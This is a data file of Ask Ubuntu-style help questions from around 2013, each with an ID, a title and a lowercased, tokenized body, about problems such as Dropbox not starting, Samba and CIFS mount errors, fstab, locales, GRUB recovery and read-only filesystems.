251170	dropbox wo n't start anymore	since a while , 2 weeks , dropbox does not startup anymore on my laptop running ubuntu 12.04 lts with gnome shell . when i run dropbox start -i in the console i get the following output . starting dropbox ... traceback ( most recent call last ) : file `` /usr/bin/dropbox '' , line 1387 , in < module > ret = main ( sys.argv ) file `` /usr/bin/dropbox '' , line 1376 , in main result = commands [ argv [ i ] ] ( argv [ i+1 : ] ) file `` /usr/bin/dropbox '' , line 1247 , in start if not start_dropbox ( ) : file `` /usr/bin/dropbox '' , line 731 , in start_dropbox stderr=sys.stderr , stdout=f , close_fds=true ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 8 ] exec format error i already removed dropbox and reinstalled it . what should i do to fix this ?
251176	very slow startup after login screen with ssd : how to troubleshoot ?	background : i was trying to solve a problem i had with libreoffice and installed/uninstalled a couple of packages ( it is a fresh install of 12.10 quantal ) . i do n't know if it is related but there is now a long pause after the login screen , before showing the desktop . i have a very recent thinkpad laptop with ssd drive and the whole boot and login process used to last only 8 seconds before this happened ! symptoms : after entering my password on the login screen , the screen turns black for about 40 seconds , before the gnome desktop is displayed . my question : how can i find out where the problem comes from ? is there a way to troubleshoot this ? bootchart only monitors the activity until the login screen . so it is useless here . it is the 3rd time i do a french install in 2 weeks because of random problems like this one : i am really getting tired of losing so much time fiddling with settings . thank you for your help !
251177	how to get rid of unwanted software ?	most of the time when i want to try a new program , the package manager tells me that i also need to install certain dependencies . figuring that the program will not work without these dependencies , i install all of them . sometimes the program is good , other times the program does n't work or crashes or i just do n't like it . how can i uninstall the program and all the dependencies that were installed with it ? do i need to manually keep track of what gets installed when and where and what it needs to function ? i do n't want a bunch of useless or otherwise unused programs cluttering up my computer , wasting space and slowing my system down . how can i get rid of it without guessing what i should and should n't need to keep ? edited 2/4/2013 to differentiate question : is there any way to remove do this without resorting to the command line ? i use muon in kubuntu and synaptic in lubuntu . can neither one of these programs remove the software and dependancies that it installs ?
251179	file sharing through samba is not working over lan	getting the following error while running net usershare command . net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error permission denied you do not have permission to create a usershare . ask your administrator to grant you permissions to create a share . how to fix this ? thanks , : )
251180	ubuntu cloud - can it do what i need ?	i am looking to propose a new system internally at work for learning purposes and think that ubuntu cloud might be appropriate but i am not sure ( a lot of presentations are too sales orientated and a lot of tutorials are very testing based , settting up only a single box etc ) . as such i had some questions to help me make the decision : we currently have very few servers to create this environment with so i want to keep machine dedicated to none nova purposes to a minimum , can i install all services except nova on a single machine and have it run well ? can the above setup be easily clustered/duplicated if we want redundancy ? can it be easily setup to allow users to create new machines and boot them from isos ( such as windows , centos etc ) via horizon ? can each user be capped on how many resources they are allowed to use ? can this all be done on 12.04 as we would need the lts ? this was posted also on the ubuntu forums a few days ago but i have had no feedback so hoped the folks over here might be able to weigh in instead .
251185	libreoffice does not detect java on fresh install of 12.10 : how to make it work ?	i ca n't use some features of libreoffice ( some extensions , macros ) because my java runtime environment ( openjdk-6 ) is not recognized in my system ( see [ screenshot ] when launching libreoffice from the terminal , i get : javaldx : could not find a java runtime environment ! please ensure that a jvm and the package libreoffice-java-common is installed . if it is already installed then try removing ~/.libreoffice/3/user/config /javasettings_linux_*.xml warning : failed to read path from javaldx fontconfig warning : `` /usr/lib/libreoffice/share/fonts/truetype/fc_local.conf '' , line 13 : having multiple < family > in < alias > is n't supported and may not works as expected there is a bug reported about this but the workaround suggested does not work for me ( install libreoffice-base ) and is additionally tagged as `` wo n't fix '' : https : //bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/926594 i tried deleting the file mentioned in the error message and re-installing both libreoffice and openjdk-6 but to no avail ... i suppose i could manually add a runtime environment from the libreoffice menu options > libreoffice > java but i do n't know which directory to choose . please help !
251187	how can i get media keys working on my dell vostro 2520 ?	some of combinations with fn on my dell vostro 2520 do n't seem to work . fn+f8 ( rewind back ) fn+f9 ( play/stop ) fn+f10 ( rewind forward ) i think that these keys need to be set up system-wide . i looked settings manager â window manager â keyboard and some other places . yet i fail to find where to set up these keys . could you tell me where to set thease keys up or a player that will understand them straight away ? i 'm using aqualung currently . update 1 i 've tried media keys in banshee . do n't work there too . and no dell provided drivers . update 2 but in parole media keys work ! hm ... now i need to pick up mp3 player
251189	telepathy on the phone	i was wondering if the ubuntu phone comes with a telepathy stack like the desktop . as far as i know `` ubuntu online accounts '' is based on code from maemo ? so any chances we get a messenger as good as the one on maemo that integrates sms , skype , xmpp etc into one app ?
251193	changing default mount point of external hdd	i know hot to assign a mount point to my usb hdd ( ntfs ) in terminal but as soon as it 's unmounted and mounted again , it goes back to default folder that is /media/seagate expansion drive what i did so far : sudo mkdir /media/myusb then mounted sudo mount /dev/sdb1 /media/myusb so how to assign myusb folder as default mount point ?
251195	`` unable to locate package '' error in ubuntu 12.10	i 'm new to ubuntu and trying to install softwares . but in every case i get this error : `e : unable to locate package sun-java6-plugin` while using sudo apt-get install command . i 've installed a fresh ubuntu 12.10 and there are no softwares . i cant even install 7zip or winrar .
251197	laptop cooling fan stops suddenly	i 'm having this problem for a long time . the cooling solution ( single fan for cpu and gpu ) on my lg 590 ( 5700 ) laptop , suddenly stops to work and do n't start again causing overheat and consequential system shutdown to prevent damage . how can i solve this ? [ i 'm using ubuntu 12.10 but the laptop was originally designed to run windows . ] thanks for your replies . the fan works normal on windows . it does n't stop cooling even under heavy load such as games or full hd videos . as the processing temperature increases , the rotation rises too . in ubuntu it happens in reverse ; when under heavy load it just stops spinning . i always use the latest stable driver version of graphics card . i have fancontrol installed because of this post : `` how to control fan speed ? '' . even tried to follow the tutorial of the final answer but got stuck after `` sudo pwmconfig '' , where it shows this : `` there are no pwm-capable sensor modules installed '' .
251198	disable localhost postfix sending emails outside my machine	i configured postfix & mutt to read mails being sent by applications locally , but i just found out that they are going out on the internet too . sometimes they reach my inbox and many times get marked as spam . how do i configure postfix to not send mail outside my machine ? i only want to be able to read emails through mutt . right now , i have this in /etc/postfix/main.cf : myorigin = localhost mydestination = $ myhostname , localhost. $ mydomain , localhost mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 relayhost =
251205	how to identify the module supposed to claim a device by vendor/product id only ?	suppose i know the numerical product/vendor ids of hardware i do n't have here and i want to know if there 's support for me in the kernel , i can do this ( usb bluetooth receiver example ) : modinfo btusb filename : /lib/modules/3.7.5-030705-generic/kernel/drivers/bluetooth/btusb.ko [ ... ] alias : usb : v0a5cp*d*dc*dsc*dp*icffisc01ip01in* alias : usb : v0489p*d*dc*dsc*dp*icffisc01ip01in* alias : usb : v413cp8197d*dc*dsc*dp*ic*isc*ip*in* [ ... ] from this i can see which devices are to be claimed by btusb and it requires me to know the module name on beforehand . in some cases however , i do n't have a clue about the module ( s ) name ( s ) supporting such a device . networking hardware is one of those categories which seems very hard to find out about . also , the lspci and lsusb names are sometimes inconclusive or simply wrong . i 'm currently grepping through the whole kernel source tree , which is not that elegant . is there a way to list all modaliases of all modules ( including built-in to the kernel ) in one go so i can find a match ? or , alternatively , is there a way to query the kernel to provide me the kernel modules claiming such a device i do n't actually own ? use cases : users asking questions here which i can answer/dupe with by actually verifying that `` support is in if you upgrade to ... '' or `` try rmmod module1 ; modprobe module2 as module2 seems to support your device as well . '' checking support before buying hardware with prior knowledge of the ids . additional to searching with the ids , i can then look for bug reports on the kernel module itself .
251206	mount usb drive with write permissions for everyone or specific user	i know there are similar questions but i get some specific problem i ca n't overcome . i have : hdd split into two partitions . /dev/sdb1 and /dev/sdb2 . sdb1 is ntfs and i do n't need it . i need sdb2 which is fat32 . ubuntu 12.04.1 lts ( server ) i want : ultimately i need a perma-mount /dev/sdb2 to /home/storage with access right ( rw ) for the user media . problems i 'm facing : 1 ) using manual mount from command line . if i just use server # sudo mount /dev/sdb2 /home/storage it mounts but the /home/storage receives root as owner and group and does n't allow media user to write there . if i use mount command without sudo as the user media - i 'm not allowed . says only root can use mount . if i use mount with options : server # sudo mount /dev/sdb2 /home/storage -o umask=000 i get what i need . a bit overdone of course , since the storage folder becomes writable for everyone . but - that is manually mounted - now i need it to remount on every reboot . 2 ) remounting on reboot - using fstab so i thought i 'll be fine if i use fstab to mount this partition ( /dev/sdb2 ) every time i reboot . the fstab line i added : uuid=8c52-c1cd /home/storage auto user , umask=000 , utf8 , noauto 0 0 got uuid with blkid . the fs type auto i changed few times ... tried vfat too , but always on the reboot ubuntu stops when processing fstab ( as i think ) with the message ( took from the log ) : fsck from util-linux 2.20.1 /dev/sda5 : clean , 120559/10969088 files , 19960144/43861504 blocks mount : unknown filesystem type 'static' mountall : mount /etc/fstab : [ 772 ] terminated with status 32 mountall : filesystem could not be mounted : /etc/fstab : skipping /etc/fstab : at user request and also - sudo mount -a never really does anything . what am i doing wrong ? i do suspect i messed up something : ) update : as it seems - fstab should hold only mounts for static drives , not any sort of usb stuff . i 'm puzzled how then this works with all the people posting on the net their success stories ... however..if this is not possible - i would like to know how to remount my usb after every reboot ... if not with fstab - than how ? : )
251207	what is hid_max_usages	question : what is hid_max_usages ? what is it used for ? and why is the value so small ? ( codeline : # define hid_max_usages 12288 in /usr/src/linux/include/linux/hid.h background info : i need to set the value to 32k and rekompile the kernel . otherwise my gaming-mouse is not recognized by ubuntu . so i want to know what this value is good for , before changing my system .
251209	how to create virtual usbs on ubuntu host connected to machines in virtualbox	i have to perform backup operations between servers . my servers are virtual machines in virtual box . what i want to do is to plug a usb in each server . servers are virtual machines so usb drivers are virtual also . two steps to do : 1- i want to create virtual usb drivers on my ubuntu host 2- then i want to connect every virtual machine in the virualbox to one of those virtual usb drivers for copying things between those servers ( machines ) . i found second step in here but could n't find first step or anything similar ! does anybody know how to create virtual usb ? does it need a special software of just can be made via command line . i found this link tell how to make a virtual image but in windows : (
251210	can we opinion about the list of core applications for the ubuntu phone ?	as many others , i am excited about the coming release of the first ubuntu phone image . on this page are listed the core applications that will be available on this image : https : //wiki.ubuntu.com/ubuntuphone/coreapps/ i wonder where can we opinion about this list . i believe that working camera and an equivalent of google maps to use the gps are very needed also . best regards , pierre
251213	unable to install default jdk	i got every time failed to fetch for apt-get install default-jdk and openjdk-6-jdk reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : ca-certificates-java fontconfig fontconfig-config hicolor-icon-theme icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common java-common libasound2 libasyncns0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libcairo2 libdatrie1 libflac8 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif4 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libice-dev libice6 libjasper1 libjpeg-turbo8 libjpeg8 libjson0 libogg0 libpango1.0-0 libpixman-1-0 libpthread-stubs0 libpthread-stubs0-dev libpulse0 libsm-dev libsm6 libsndfile1 libthai-data libthai0 libtiff4 libvorbis0a libvorbisenc2 libx11-dev libx11-doc libxau-dev libxcb-render0 libxcb-shm0 libxcb1-dev libxcomposite1 libxcursor1 libxdamage1 libxdmcp-dev libxfixes3 libxft2 libxi6 libxinerama1 libxrandr2 libxrender1 libxt-dev libxt6 libxtst6 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib shared-mime-info ttf-dejavu-core ttf-dejavu-extra tzdata-java x11-common x11proto-core-dev x11proto-input-dev x11proto-kb-dev xorg-sgml-doctools xtrans-dev suggested packages : default-jre equivs libasound2-plugins libasound2-python librsvg2-common gvfs libjasper-runtime ttf-baekmuk ttf-arphic-gbsn00lp ttf-arphic-bsmi00lp ttf-arphic-gkai00mp ttf-arphic-bkai00mp pulseaudio libxcb-doc openjdk-6-demo openjdk-6-source visualvm icedtea-plugin libnss-mdns sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-wqy-microhei ttf-wqy-zenhei ttf-indic-fonts-core ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : ca-certificates-java fontconfig fontconfig-config hicolor-icon-theme icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common java-common libasound2 libasyncns0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libcairo2 libdatrie1 libflac8 libfontconfig1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif4 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libice-dev libice6 libjasper1 libjpeg-turbo8 libjpeg8 libjson0 libogg0 libpango1.0-0 libpixman-1-0 libpthread-stubs0 libpthread-stubs0-dev libpulse0 libsm-dev libsm6 libsndfile1 libthai-data libthai0 libtiff4 libvorbis0a libvorbisenc2 libx11-dev libx11-doc libxau-dev libxcb-render0 libxcb-shm0 libxcb1-dev libxcomposite1 libxcursor1 libxdamage1 libxdmcp-dev libxfixes3 libxft2 libxi6 libxinerama1 libxrandr2 libxrender1 libxt-dev libxt6 libxtst6 openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib shared-mime-info ttf-dejavu-core ttf-dejavu-extra tzdata-java x11-common x11proto-core-dev x11proto-input-dev x11proto-kb-dev xorg-sgml-doctools xtrans-dev 0 upgraded , 78 newly installed , 0 to remove and 3 not upgraded . need to get 25.3 mb/61.7 mb of archives . after this operation , 180 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main openjdk-6-jre-headless amd64 6b24-1.11.5-0ubuntu1~12.04.1 [ 25.3 mb ] fetched 25.3 mb in 4s ( 5325 kb/s ) failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b24-1.11.5-0ubuntu1~12.04.1_amd64.deb hash sum mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? thanks for you help
251214	how to calibrate the touchscreen of cf-19 toughbook with 12.10 calibration tool ?	i have tried several options from various forums . proper calibration should not be this difficult . i have run the calibration tool and most sites say to include a section of the output in a particular file in the /etc/x11/ ... . file . this file does not exist . one site said the file was in the /usr/x11/ ... . directory and that an additional option for calibration should be added . this made no difference . i included the section from the calibration tool in this file renaming the input device . this also had no effect . does anyone know how to successfully calibrate my touchscreen , and can ubuntu guru 's develop the calibration software so that the output of the calibration tool is automatically stored where it should be ?
251215	how do i reconfigure locales properly on my desktop after installation ?	i have dived several times into the labyrinthine locales configuration system , reading man pages and browsing the internet . every blog/tutorial/q & a i read is either incomplete , adventurous , hyper complex , risky , contradictory , erroneous , incomprehensible , out of the case explanation , or all of them at the same time , and never explain how to undo the changes they suggest . when installing a normal ubuntu desktop , i want these reasonable settings : a certain keyboard model , in a certain language with certain options . a certain ( different ) language for default user folders , for the system and programs . a certain ( different ) language for numeric ( thousands and decimals notation ) format . a certain ( different ) language for dates format ( the same as the keyboard language , in my case ) and , last but not least , i 'd like the desktop calendar to consider weeks starting at monday rather than sunday . to configure these few things is something super simple in windows , but in ubuntu it seems to be a freaking nightmare . for example , i may want : a certain apple keyboard for spain with its special symbols . all the system : names , messages , help info , applications , buttons ... , in english . dots to separate decimals and commas to separate thousands ( not the spanish way ) date formats in a certain spanish format . weeks starting at monday in the desktop calendar . can anybody help ? i am still waiting for an answer to this common problem . is there no clear simple way to do it ?
251220	grub prompt after upgrade from 10.04 lts to 12.04 lts	i am a linux newbie who has tried to update from ubuntu 10.04 lts ( used for 3 years ) to 12.04 lts on my dell desktop using update manager . i thought all was working well , even though my hd partition desktop is small ( just 20gb ) and commentary stated short disk space . i am now faced with the grub > prompt , what do i do now ? can i go back to 10.04 or boot via usb ?
251222	start terminal from bootable usb drive	i am running ubuntu from a bootable usb drive on an old machine . the graphical interface is using up all the memory and i actually just need a terminal . is there a way to not start the desktop environment from a live os image ?
251225	anyone know how to reset source.list ?	is there anyway to reset my source.list ? i try to follow the trick for this forum http : //ubuntuforums.org/showthread.php ? t=1219528 but not helping .. what i want is , , to reinstall the ubuntu 1204 source list . without reinstalling the ubuntu via live cd . and make my os like fresh installing .. anyone can help me ? thanks santos @ santos : ~ $ sudo su [ sudo ] password for santos : root @ santos : /home/santos # grep -r ppa /etc/apt /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/fullcircle-issue-59/ubuntu /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/tiberiumalliances/ubuntu /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/lordofultima/ubuntu /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/plexmediaserver/ubuntu /etc/apt/auth.conf : machine private-ppa.launchpad.net/commercial-ppa-uploaders/tiberiumalliances/ubuntu /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_fullcircle-issue-59_ubuntu.list.save : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/fullcircle-issue-59/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/skype-wrapper-ppa-precise.list.save : deb-src http : //ppa.launchpad.net/skype-wrapper/ppa/ubuntu precise main /etc/apt/sources.list.d/agmenor-discvur-precise.list.save : deb-src http : //ppa.launchpad.net/agmenor/discvur/ubuntu precise main /etc/apt/sources.list.d/hakermania-format-junkie-precise.list.save : deb-src http : //ppa.launchpad.net/hakermania/format-junkie/ubuntu precise main /etc/apt/sources.list.d/achadwick-mypaint-testing-precise.list.save : deb http : //ppa.launchpad.net/achadwick/mypaint-testing/ubuntu precise main /etc/apt/sources.list.d/achadwick-mypaint-testing-precise.list.save : deb-src http : //ppa.launchpad.net/achadwick/mypaint-testing/ubuntu precise main /etc/apt/sources.list.d/fioan89-slidewall-precise.list.save : deb http : //ppa.launchpad.net/fioan89/slidewall/ubuntu precise main /etc/apt/sources.list.d/nginx-stable-precise.list.save : deb-src http : //ppa.launchpad.net/nginx/stable/ubuntu precise main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_plexmediaserver_ubuntu.list.save : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/plexmediaserver/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_tiberiumalliances_ubuntu.list.save : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/tiberiumalliances/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/folke-schwinning-personal-precise.list.save : deb http : //ppa.launchpad.net/folke-schwinning/personal/ubuntu precise main /etc/apt/sources.list.d/brianrobles204-xkcd-browser-precise.list.save : deb-src http : //ppa.launchpad.net/brianrobles204/xkcd-browser/ubuntu precise main /etc/apt/sources.list.d/noneed4anick-cuttlefish-precise.list.save : deb-src http : //ppa.launchpad.net/noneed4anick/cuttlefish/ubuntu precise main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_plexmediaserver_ubuntu.list : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/plexmediaserver/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/ubuntu-mozilla-daily-firefox-aurora-precise.list.save : deb-src http : //ppa.launchpad.net/ubuntu-mozilla-daily/firefox-aurora/ubuntu precise main /etc/apt/sources.list.d/webapps-preview-precise.list.save : deb-src http : //ppa.launchpad.net/webapps/preview/ubuntu precise main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_tiberiumalliances_ubuntu.list : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/tiberiumalliances/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/myunity-ppa-precise.list.save : deb http : //ppa.launchpad.net/myunity/ppa/ubuntu precise main /etc/apt/sources.list.d/luciomrx-switzallnew-precise.list.save : deb http : //ppa.launchpad.net/luciomrx/switzallnew/ubuntu precise main /etc/apt/sources.list.d/webupd8team-y-ppa-manager-precise.list.save : deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu precise main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_intellij-idea-ce_ubuntu.list.save : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/george-edison55-nitroshare-precise.list.save : deb-src http : //ppa.launchpad.net/george-edison55/nitroshare/ubuntu precise main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_lordofultima_ubuntu.list.save : deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/lordofultima/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/achadwick-mypaint-testing-precise.list : deb http : //ppa.launchpad.net/achadwick/mypaint-testing/ubuntu precise main /etc/apt/sources.list.d/achadwick-mypaint-testing-precise.list : deb-src http : //ppa.launchpad.net/achadwick/mypaint-testing/ubuntu precise main /etc/apt/sources.list.d/atareao-atareao-precise.list.save : deb-src http : //ppa.launchpad.net/atareao/atareao/ubuntu precise main root @ santos : /home/santos #
251233	ecryptfs - need to remove from drive	okay , so i have a new server with ubuntu 12.04 . i added the drive from my old and was trying to move data from the main drive and of course when i mounted it i ran into access_your_private_data.desktop and readme.txt files as i had used the default home drive encryption when i installed the older os . in effort to fix this i went through a tutorial that evidently did n't cover all aspects of the process and it appears to have had some undesired consequences . prior to trying to decrypt the drive i could boot it another machine and access the data no problem as it would un-encrypt at sign in , however now the partition seems to be mounted to /home/username/.private . at the very least i 'm trying to undue this so i can have a chance at recovering the data on the drive . at best i 'd like to remove encryption from the home drive all together . any help would be great ! i used the following commands : # d=/media/chroot # mount -o bind /dev $ d/dev # mount -o bind /sys $ d/sys # mount -o bind /dev/shm $ d/dev/shm # mount -o bind /proc $ d/proc sudo mount -t ecryptds /home/ ( username ) /.ecryptfs/media/.ecryptfs /mnt/media/old sudo ecryptfs-mount-private
251238	erase backup files external hard drive	i 'm looking for a way to delete automatic backup files ( those on the form `` filename.extension~ '' ) from a external hard drive , where i keep a backup from my main disk . if the files were in /home , i could erase them with bleachbit or a similar program , like ubuntu tweak . is it possible to do ?
251254	mint theme not working properly in ubuntu 12.10	i decided to run mint theme on ubuntu 12.10 . it installed properly but when i right-click on desktop or open the file menu then it displayed a color mixture and the menu items are not clearly visible . * the view as follows below in the image : the menu not looking the correct way , and the same when i right click on desktop .
251256	what to do if i can no longer become the user root ?	i have no root password and i accidentally removed the sudo privileges of the only account left . any suggestions ?
251258	batch rename with id shifting ?	i need to batch rename bunch of files with id in name , adding a constant number to id < id > -xxx.txt = > < id+shift > -yyy.txt any ideas how to make it ? some awk maybe ?
251260	update manager fails with error : `` the following packages have unmet dependencies ''	when i was trying to update packages with the update manager , i got an error about third-party repositories . but when i click details , i see : the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.3 ) but 2.15-0ubuntu10.2 is installed any help ?
251263	why am i asked for the `` password for root '' when upgrading packages ?	i have a fresh install of ubuntu 12.04 . i installed with one user account , then added a second user account using the gui dialog box method , making myself an administrator type . i now use the second user account . when using update manager and it needs to add or remove packages , it asks me for the `` password for root '' rather than my own password . i 've installed and used a lot of ubuntu systems and never been asked for the root password before . i know how to set a root password so i can work around this situation . sudo works fine and i 'm very comfortable on the command line , so i can do everything i need to . but i want to understand why my account is not allowed to authorise upgrades etc using the gui . i have checked the groups and added my account to all that the installuser has . $ groups hamish adm cdrom sudo dip plugdev lpadmin sambashare $ groups installuser installuser : installuser adm cdrom sudo dip plugdev lpadmin sambashare edit $ id uid=1001 ( hamish ) gid=1001 ( hamish ) groups=1001 ( hamish ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,29 ( audio ) ,30 ( dip ) ,46 ( plugdev ) ,110 ( lpadmin ) ,114 ( netdev ) ,126 ( sambashare ) ,130 ( vboxusers ) $ id installuser uid=1000 ( installuser ) gid=1000 ( installuser ) groups=1000 ( installuser ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,110 ( lpadmin ) ,126 ( sambashare ) $ sudo tree /var/lib/polkit-1 /var/lib/polkit-1 └── localauthority ├── 10-vendor.d │ └── com.ubuntu.desktop.pkla ├── 20-org.d ├── 30-site.d ├── 50-local.d └── 90-mandatory.d $ sudo grep -a 3 update /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla [ update already installed software ] identity=unix-group : admin ; unix-group : sudo action=org.debian.apt.upgrade-packages resultactive=yes as you can see from the tree command above , there are no other files under /var/lib/polkit-1 to override com.ubuntu.desktop.pkla . i have n't edited that file either . does this mean i should be in the admin group as well as the sudo group ? or should being in one group be enough ? what else should i look at ? edit 2 just checked and there is no admin group in /etc/group - is that unusual ? should i add that group and then add myself to that group ? ( apparently not - see comment below by @ eric carvalho ) edit 3 $ gconftool -g /apps/gksu/sudo-mode true
251270	what is the key combination for alphabet 'ज्ञ ' on hindi bolnagari key board ?	i 'm using hindi bolnagari key board layout . i 'm not able to get the key combination for the alphabet ज्ञ . please help .
251273	move certain subfolders to another folder	i have a main folder with several subfolders ( that have a numbered name format ) , and i need to retrieve just the ones that start with 6 , to a folder . can i make this recursevely ?
251277	command after close nautilus	i open nautilus by command line in new window . i want to execute another command after nautilus is closed . like this : bash -c 'sshfs -o idmap=user my_user @ 192.168.1.200 : / /media/192.168.1.200 | nautilus /media/192.168.1.200 ; fusermount -u /media/192.168.1.200' in this case , i want to execute fusermount -u /media/192.168.1.200 only after nautilus is closed . is possible ? addendum : i often multiple nautilus windows open . so i want to close this window only .
251283	why am i getting [ mount error ( 22 ) : invalid argument ] while trying to mount smb network drive ?	disclaimer : i am very new to linux : ) anyway , onward : i have a fresh instance of ubuntu server ( 12.04.1 lts ) running on my network and i want to mount a network drive to the server so i can access the contents . the network drive is a samba compatible drive running darwin os . if i run the following command : smbclient -l //192.168.0.2 -u myuser it prompts me for the password and then displays output similar to : domain= [ server01 ] os= [ darwin ] server= [ @ ( # ) program : smbd project : smbx-105.4.0 ] sharename type comment -- -- -- -- - -- -- -- -- -- - comp staff 's public folder disk compraid03 disk dropbox disk groups disk ipc $ ipc public disk users disk compstaff disk however , when i try and mount the compraid03 share , using this command : sudo mount -t cifs //192.168.0.2/compraid03 /mnt/myshare -o username=myuser i get the same password prompt , but after putting the correct password in , i received this error : mount error ( 22 ) : invalid argument dmesg | tail returns : [ 23576.037373 ] cifs vfs : cifs_mount failed w/return code = -22 i do n't understand what is wrong with this command . i 've managed to mount a share on my current ( windows 8 ) machine using basically the same command but with a different ip address and share name ( obviously ) . i 've spent a good few hours trying to solve this and got no where . any help or pointers would be greatly appreciated . thanks steve edit as suggested i 've also trued using `` user= '' instead of `` username= '' : sudo mount -t cifs //192.168.0.2/compraid03 /mnt/svnrepo -o user=myuser this results in the same `` invalid argument '' error . edit 2 i feel i should add to the question that in the end i could n't figure out what the problem was , but , i used the exact same command to mount a share on a different shared drive that was running debian and it worked fine - i can only assume it 's therefore a flaw or idiosyncrasy of the samba implementation that darwin os is using .
251284	ubuntu goes into read-only mode randomly	for the last few days , my ubuntu 12.10 has been going to read-only mode randomly , making me unable to save any edited files , and forcing me to restart my computer , which is a pain because this is the platform on which i do all my programming work . when i do restart into ubuntu ( i have a dual-boot with windows 7 ) , it tells me that it detected a disk error , and that i have to press f to fix it , after which it will restart successfully . my windows 7 does n't have any problems with it , so it ca n't be the hard disk . i also saw on a forum that i should run these commands to fix the issue : mount -- options remount , rw / and mount -- all , but these just say that i can not mount the device on a read-only system . i 'm a linux newbie ( and a newbie with computers in general ) so any help would be greatly appreciated ! edit 1 : okay , so i ran fsck from the boot cdâś is it supposed to only take two seconds ? 'cuz mine did . anyway , it came back with two errors : superblock last mount time is in the future ( hardware clock incorrect ) and superblock last write time is in the future ( hardware clock incorrect ) it fixed both of them , apparently . edit 2 : i just ran sudo fsck -cf /dev/sda5 . found a lot more this time . is fsck supposed to take only a few seconds ? edit 3 : i just ran sudo badblocks -v /dev/sda5 and badblocks found four bad sectors : 27238968 27238969 27238970 27238971 what do i do with this knowledge ? the guide bodhi linked says to write them to a file , but i 'm in livecd - i ca n't write anything to the hard disk .
251296	how to start skype 4 with ubuntu 12.10 ?	i 've installed skype and it 's running all ok but i want it to start automatically when i log with my user . how can i do that ?
251297	car radio sd does n't work when formated from ubuntu	my radio car reads sd card only when formated from windows . when i format it from ubuntu it says `` no file '' , althought in the computer ( both from windows and ubuntu ) i can see their contents . is there a way to do it from ubuntu exactly like windows do it ?
251298	ubuntu server - losing vmware network connection	ubuntu server - losing data hi ! i have installed ubuntu 12.04 in vmware . it worked great untill i did something stupid because my firewall was turned on . so , the problem i think comes from : sudo dhclient eth0 . after entered this command , and did a little more programming i had to shut it down . now , i ca n't boot it normally . also , i get this error : which i skip by ctrl+alt+f2 . now , i am okey losing this ubuntu server , but i need the sensitive data from it . so , without any burning software , i tried : using removable drive and it detects it but i do n't know where to find it . even if i go here : - nothing happens i have a partition fat32 empty so i mounted it as a second hard disk - also , i do n't know where to find it elsewhere than /mount . the network adapter : how can i recover the data ? is it lost ? can i fix the bug ? i want network acces so samba can work - would be so easy .
